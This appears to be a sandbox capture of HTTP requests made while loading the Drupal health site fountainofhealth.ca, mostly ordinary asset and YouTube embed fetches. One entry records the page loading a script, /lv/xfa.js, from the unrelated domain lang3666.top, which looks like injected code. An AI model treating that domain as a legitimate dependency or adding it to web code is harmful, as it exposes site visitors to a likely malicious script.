Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/sticky-header.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/system-status-counter.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/system-status-report-counters.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/system-status-report-general-info.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/tablesort.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/tree-child.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/views/css/views.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/ckeditor5/css/ckeditor5.dialog.fix.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /modules/views_slideshow/modules/views_slideshow_cycle/css/views_slideshow_cycle.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/theme.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /modules/ajax_loader/css/wave.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /lv/xfa.js HTTP/1.1Host: lang3666.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://fountainofhealth.ca/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6mcCVPn7U+UYE3l&MD=ceMdVNLn HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic HTTP traffic detected: GET /core/misc/debounce.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/announce.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/message.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/misc/message.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/ajax.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2024-05/Group%209823_0.png?itok=DMkwTIJn HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/misc/ajax.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX HTTP/1.1host: www.youtube.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic HTTP traffic detected: GET /modules/ajax_loader/js/ajax-throbber.js?v=1.x HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /modules/google_analytics/js/google_analytics.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/js/custom.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/js/script.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /embed/h15NcT6UXh0?si=YrXkudamh5IoggTR HTTP/1.1host: www.youtube.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/js/thrivequestion.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws HTTP/1.1host: www.youtube.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/js/banner-slider.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/drupal.bootstrap.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/attributes.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/theme.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /modules/webform/js/webform.behaviors.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/states.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /s/player/59b252b9/www-player.css HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=X1ona4g8SHEcookie: VISITOR_INFO1_LIVE=KOw3SU8QT4Qcookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgOw%3D%3Dcookie: __Secure-ROLLOUT_TOKEN=CKud1P3Cn6KvrAEQt4fm56y3jQMYt4fm56y3jQM%3Dpriority: u=0
Source: global traffic HTTP traffic detected: GET /s/player/59b252b9/player_ias.vflset/en_US/embed.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=xkpzWs-1UAwcookie: __Secure-ROLLOUT_TOKEN=CPOg5tKQz7TMJhCAkebnrLeNAxiAkebnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=exFbymtgdn0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgXA%3D%3Dpriority: u=1
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/misc/states.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
